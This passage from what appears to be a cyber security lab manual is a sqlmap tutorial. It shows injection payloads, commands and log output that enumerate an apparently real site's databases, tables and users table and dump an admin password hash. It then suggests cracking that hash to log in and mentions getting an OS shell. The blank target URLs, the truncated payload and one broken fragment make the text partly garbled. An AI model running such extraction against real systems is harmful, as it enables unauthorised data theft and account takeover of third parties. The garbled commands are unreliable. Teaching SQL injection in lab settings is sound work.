
sqlmap is also able to identify the remote system os, database name and version. Here is how

the output might look like

[*] starting at 12:10:33

[12:10:33] [INFO] resuming back-end DBMS 'mysql'

[12:10:34] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


Place: GET

Parameter: id

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=51 AND (SELECT 1489 FROM(SELECT

COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0

END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM



[12:10:37] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD

web application technology: Apache 2.2.22

back-end DBMS: MySQL 5

So the sqlmap tool has discovered the operating system, web server and database along with

version information. Even this much is pretty impressive. But its time to move on and see what

more is this tool capable of.

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next

step is to find out the names of the databases that exist on the remote system. The "--dbs" option

is used to get the database list.

$ python -u "" --dbs

The output could be something like this

[*] starting at 12:12:56

[12:12:56] [INFO] resuming back-end DBMS 'mysql'

[12:12:57] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


Place: GET

Parameter: id

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=51 AND (SELECT 1489 FROM(SELECT

COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0

Cyber Security LAB Manual SSASIT, Surat


END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM



[12:13:00] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD

web application technology: Apache 2.2.22

back-end DBMS: MySQL 5

[12:13:00] [INFO] fetching database names

[12:13:00] [INFO] the SQL query used returns 2 entries

[12:13:00] [INFO] resumed: information_schema

[12:13:00] [INFO] resumed: safecosmetics

available databases [2]:

[*] information_schema

[*] safecosmetics

The output shows the existing databases on the remote system.

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the database of

interest over here is 'safecosmetics'


$ python -u "" --tables -D safecosmetics

and the output can be something similar to this

[11:55:18] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD

web application technology: Apache 2.2.22

back-end DBMS: MySQL 5

[11:55:18] [INFO] fetching tables for database: 'safecosmetics'

[11:55:19] [INFO] heuristics detected web page charset 'ascii'

[11:55:19] [INFO] the SQL query used returns 216 entries

[11:55:20] [INFO] retrieved: acl_acl

[11:55:21] [INFO] retrieved: acl_acl_sections

........... more tables

isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some

important table. Lets say the table is 'users' and it contains the username and password.

$ python -u "" --columns -D safecosmetics -T


The output can be something like this

[12:17:39] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD

web application technology: Apache 2.2.22

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back-end DBMS: MySQL 5

[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'

[12:17:41] [INFO] heuristics detected web page charset 'ascii'

[12:17:41] [INFO] the SQL query used returns 8 entries

[12:17:42] [INFO] retrieved: id

[12:17:43] [INFO] retrieved: int(11)

[12:17:45] [INFO] retrieved: name

[12:17:46] [INFO] retrieved: text

[12:17:47] [INFO] retrieved: password

[12:17:48] [INFO] retrieved: text


[12:17:59] [INFO] retrieved: hash

[12:18:01] [INFO] retrieved: varchar(128)

Database: safecosmetics

Table: users

[8 columns]


| Column | Type |


| email | text |

| hash | varchar(128) |

| id | int(11) |

| name | text |

| password | text |

| permission | tinyint(4) |

| system_allow_only | text |

| system_home | text |


So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part, of extracting the data from the table. The command would


$ python -u "" --dump -D safecosmetics -T


The above command will simply dump the data of the particular table, very much like the

mysqldump command.

The output might look similar to this


| id | hash | name | email | password | permission | system_home |

system_allow_only |


| 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank>



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The hash column seems to have the password hash. Try cracking the hash and then you would

get the login details rightaway. sqlmap will create a csv file containing the dump data for easy


So far we have been able to collect a lot of information from the remote database using sqlmap.

Its almost like having direct access to remote database through a client like phpmyadmin. In

real scenarios hackers would try to gain a higher level to access to the system. For this, they

would try to crack the password hashes and try to login through the admin panel. Or they would

try to get an os shell using sqlmap.

According to the sqlmap manual

It is possible to run arbitrary commands on the database server's underlying operating system

when the back-end database management system is either MySQL, PostgreSQL or Microsoft

SQL Server, and the session user has the needed privileges to abuse database specific

functionalities and architectural weaknesses.

The most important privilege needed by the current database user is to write files through the

database functions. This is absent in most cases. Hence this technique will not work in most



1. Sometimes sqlmap is unable to connect to the url at all. This is visible when it gets stuck at

the first task of "testing connection to the target url". In such cases its helpful to use the "--

random-agent" option. This makes sqlmap to use a valid user agent signature like the ones send

by a browser like chrome or firefox.

2. For urls that are not in the form of param=value sqlmap cannot automatically know where to

inject. For example mvc urls like

In such cases sqlmap needs to be told the injection point marked by a **/80

The above will tell sqlmap to inject at the point marked by *

3. When using forms that submit data through post method then sqlmap has to be provided the

post data in the "--data" options. For more information check out this tutorial on using sqlmap

with forms.





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